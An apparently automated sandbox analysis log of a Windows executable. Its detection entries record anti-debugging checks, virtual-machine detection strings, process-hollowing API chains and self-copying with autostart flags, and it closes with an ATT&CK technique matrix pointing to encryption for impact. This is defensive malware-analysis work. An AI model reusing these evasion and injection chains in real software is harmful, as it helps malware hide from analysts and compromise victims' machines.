        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000751000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW s{%SystemRoot%\system32\mswsock.dllxx
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170674140.0000000000678000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000003.2250953642.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000698000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.0000000000918000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2424058932.0000000000773000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeAPI call chain: ExitProcess graph end nodegraph_0-54183
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeAPI call chain: ExitProcess graph end nodegraph_0-54126
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeAPI call chain: ExitProcess graph end nodegraph_2-45121
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0217971C rdtsc 0_2_0217971C
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00410610 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00410610
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00411502 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,0_2_00411502
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00412100 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_00412100
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_021780A3 push dword ptr fs:[00000030h]0_2_021780A3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02210042 push dword ptr fs:[00000030h]0_2_02210042
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_021640A3 push dword ptr fs:[00000030h]5_2_021640A3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02200042 push dword ptr fs:[00000030h]5_2_02200042
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_020880A3 push dword ptr fs:[00000030h]6_2_020880A3
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B0042 push dword ptr fs:[00000030h]6_2_022B0042
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004278D5 GetProcessHeap,2_2_004278D5
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0040C100 SetUnhandledExceptionFilter,0_2_0040C100
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041E5C0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041E5C0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00410610 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00410610
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00404A20 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00404A20
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02210110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02210110
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeMemory written: C:\Users\user\Desktop\tsnsd8pOvn.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeMemory written: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe"
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTask
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --Task
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022380F6 cpuid 0_2_022380F6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: GetLocaleInfoA,0_2_0041C380
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_02250AB6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_0223C8B7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_0224394D
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_022449EA
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_02243F87
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: EnumSystemLocalesW,2_2_004387C8
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: GetLocaleInfoW,2_2_0043884E
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: EnumSystemLocalesW,2_2_00437E27
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_02240AB6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0222C8B7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_0223394D
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_022349EA
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_02233F87
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_022F0AB6
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,6_2_022DC8B7
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_022E394D
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_022E49EA
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_022E3F87
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041EE80 CreateNamedPipeA,WaitForMultipleObjects,DeleteVolumeMountPointA,GetSystemPowerStatus,GetVolumeInformationA,OpenThread,GetProcessPriorityBoost,RequestWakeupLatency,CreateJobObjectA,GetPrivateProfileSectionNamesW,GlobalFix,LocalLock,WriteProfileStringA,0_2_0041EE80
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041F210 GetConsoleFontSize,DisconnectNamedPipe,GetLocalTime,GetLastError,GetCommandLineW,OpenWaitableTimerW,WritePrivateProfileStructA,ScrollConsoleScreenBufferW,GetConsoleCursorInfo,SetConsoleActiveScreenBuffer,GlobalFlags,GetBinaryTypeA,RaiseException,HeapCreate,GetOEMCP,SetCommMask,GetTapeParameters,VirtualAlloc,GetCurrentDirectoryW,SetComputerNameW,GetProcessPriorityBoost,GlobalWire,SetEnvironmentVariableA,CopyFileA,GetProfileSectionA,SetEndOfFile,ExitProcess,0_2_0041F210
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041F450 lstrlenA,GetWindowInfo,_memset,__vsnprintf,_wscanf,__wrename,_realloc,_realloc,__wctomb_s_l,GlobalAlloc,GetOverlappedResult,GetLastError,GetFileAttributesW,SearchPathW,GetProfileStringW,ExitProcess,GetModuleHandleA,GetProcAddress,WriteConsoleA,GetProcessPriorityBoost,SetFileApisToANSI,OpenSemaphoreW,SetSystemTime,GetPrivateProfileIntA,GetSystemDefaultLangID,GetUserDefaultLCID,SetVolumeLabelW,WaitForMultipleObjects,OpenMutexW,SystemTimeToTzSpecificLocalTime,GetTimeZoneInformation,MoveFileW,0_2_0041F450
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041ED40 BuildCommDCBAndTimeoutsA,SetComputerNameW,LoadLibraryW,FreeLibraryAndExitThread,GetVersionExA,VerifyVersionInfoW,OpenFile,SetHandleInformation,DeactivateActCtx,GetTapeParameters,GetTempFileNameA,GetConsoleDisplayMode,GetConsoleDisplayMode,GetDriveTypeW,RequestWakeupLatency,TlsSetValue,0_2_0041ED40
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 2 System Time Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 2 Data Encrypted for Impact
        Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 2 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | 1 Services File Permissions Weakness | 212 Process Injection | 2 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 24 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Services File Permissions Weakness | 1 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Virtualization/Sandbox Evasion | Cached Domain Credentials | 141 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 212 Process Injection | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Services File Permissions Weakness | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
